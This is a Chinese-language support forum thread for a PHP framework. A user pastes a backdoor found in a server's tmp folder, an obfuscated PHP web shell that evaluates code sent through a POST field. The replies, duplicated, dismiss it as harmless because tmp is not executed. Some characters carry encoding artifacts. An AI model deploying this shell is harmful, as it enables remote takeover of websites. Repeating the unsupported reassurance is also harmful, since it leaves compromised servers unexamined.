迅睿開源框架是一款PHP8高性能·簡(jiǎn)單易用的PHP開源開發(fā)框架, 基于MIT開源許可協(xié)議發(fā)布,不限制商業(yè)使用,以多端互聯(lián)為設(shè)計(jì)理念, 支持的微信公眾號(hào)、小程序、APP客戶端、移動(dòng)端網(wǎng)站、PC網(wǎng)站等多終端式管理系統(tǒng)。
業(yè)務(wù)經(jīng)理
微信掃描以上二維碼
028-61286886
技術(shù)咨詢
在服務(wù)器臨時(shí)文件夾(tmp)出現(xiàn)后門文件。
<?php @$a = $_POST['x']; if(isset($a)){ @preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=')); } ?>
這是什么問題啊?
還有一部分加密代碼。
或者怎么禁止產(chǎn)生緩存文件呢?
服務(wù)器臨時(shí)文件有這個(gè)文件沒有安全威脅的,tmp不會(huì)被執(zhí)行,放心
判斷來源,如果服務(wù)器只有pos程序,那必然是pos帶過來的,如果有其他程序就難說
還有新版的安全檢測(cè)功能很強(qiáng),安全配置一下應(yīng)該不會(huì)被攻擊
主要看是不是從poscms寫入的
服務(wù)器臨時(shí)文件有這個(gè)文件沒有安全威脅的,tmp不會(huì)被執(zhí)行,放心
判斷來源,如果服務(wù)器只有pos程序,那必然是pos帶過來的,如果有其他程序就難說
還有新版的安全檢測(cè)功能很強(qiáng),安全配置一下應(yīng)該不會(huì)被攻擊
主要看是不是從poscms寫入的